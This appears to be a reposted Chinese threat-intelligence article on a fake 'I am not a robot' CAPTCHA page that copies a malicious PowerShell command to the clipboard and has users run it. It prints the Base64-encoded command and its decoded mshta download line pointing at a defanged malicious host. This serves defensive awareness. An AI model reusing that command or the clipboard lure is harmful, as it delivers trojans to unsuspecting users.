人机验证诱骗用户运行危险的PowerShell脚本

admin 2024年9月9日19:29:37评论36 views字数 1634阅读5分26秒阅读模式
人机验证诱骗用户运行危险的PowerShell脚本

我们团队发现了一种网络安全威胁,它利用用户对CAPTCHA验证过程的信任。

一个假冒的CAPTCHA网页,antibotx.b-cdn[.]net/captcha-verify.html,诱骗用户运行一个恶意的PowerShell脚本,该脚本下载并执行恶意软件。

这种攻击利用了流行的“我不是机器人”CAPTCHA,导致用户无意中通过运行恶意命令来危及他们的系统。

这种攻击方法特别阴险,因为它需要用户交互,并依赖于内置的Windows功能。

由于命令是通过用户的操作系统直接执行的,传统的防病毒程序更难检测到恶意行为。

工作原理:

攻击始于用户访问一个不安全的网页,这些网页很可能包含不安全的第三方广告。

这些广告可能会将用户重定向到一个恶意的CAPTCHA页面。假冒的CAPTCHA看起来合法,并包括一个“我不是机器人”按钮,这在许多需要人类验证的网站上很常见。

人机验证诱骗用户运行危险的PowerShell脚本
图:1 伪造的 CAPTCHA 网页

然而,点击这个按钮时,网页会秘密地将一个PowerShell命令复制到用户的剪贴板。

攻击的下一阶段开始于假冒CAPTCHA提示用户通过按Windows + R打开运行命令。

人机验证诱骗用户运行危险的PowerShell脚本
图:2 点击按钮后出现验证步骤

然后,用户被指示将剪贴板内容(已经被恶意命令替换)粘贴并按回车。

这个动作触发了PowerShell命令的执行,最终下载并运行一个名为trans08.exe的恶意文件。

人机验证诱骗用户运行危险的PowerShell脚本

图:3 通过 Run 执行的命令

复制到用户剪贴板的命令是一个Base64编码的字符串,隐藏了恶意指令。

powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgBhADAAOAAiAA==

这个命令看起来具有欺骗性,因为字符串是用Base64编码的,这是一种将二进制数据转换为可读文本以便于传输的技术。

Base64编码的字符串隐藏了以下真实命令:

mshta "https://clicktogo[.]click/downloads/tra08"

mshta实用程序用于运行Microsoft HTML应用程序(HTA),但在这种情况下,它被滥用来下载恶意软件。

值得一提的是,上述文件是一个特洛伊木马,允许攻击者控制受感染的机器或从用户的系统中窃取敏感数据。

一旦下载,trans08.exe文件表现得像一个特洛伊木马,试图重新连接到其命令和控制(C2)服务器并执行其他恶意操作。

人机验证诱骗用户运行危险的PowerShell脚本
图:4 连接C2的恶意Tra08程序

恶意软件还使用了一种欺骗技术,冒充微软公司作为其开发者名称。

然而,在分析过程中发现,恶意软件可以检测它是否在受控环境中运行,例如恶意软件沙箱或虚拟机。

如果检测到这样的环境,恶意软件拒绝执行或重新连接到服务器,从而避免被安全研究人员检测到。

此外,可执行文件似乎与旧版本的Windows不兼容。

它不会在运行Windows 7或更早版本的系统上运行,返回错误提示应用程序不是有效的Win32应用程序。

人机验证诱骗用户运行危险的PowerShell脚本
图:5 文件无法在 Windows 7 中运行

这表明恶意软件针对的是更现代的系统,这可能增加其在未修补或安全性较低的较新Windows版本上的效率。

与其他CAPTCHA诈骗的比较:

这种新型攻击与更常见的与CAPTCHA相关的诈骗有显著不同。

假冒CAPTCHA页面通常用于诱骗用户接受不需要的浏览器推送通知,然后这些通知会用广告或网络钓鱼链接轰炸他们的系统。

然而,这种诈骗更进一步,诱骗用户运行一个PowerShell命令,该命令下载并安装了恶意软件。

在这种攻击中使用PowerShell和剪贴板操作展示了一种更复杂的技术,严重依赖社会工程学。

与传统的恶意软件分发方法(如电子邮件附件或驱动下载)不同,这种方法需要用户的积极参与,使得自动化检测更加困难。

原文始发于微信公众号(独眼情报):人机验证诱骗用户运行危险的PowerShell脚本

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月9日19:29:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   人机验证诱骗用户运行危险的PowerShell脚本http://cn-sec.com/archives/3141792.html

发表评论

匿名网友 填写信息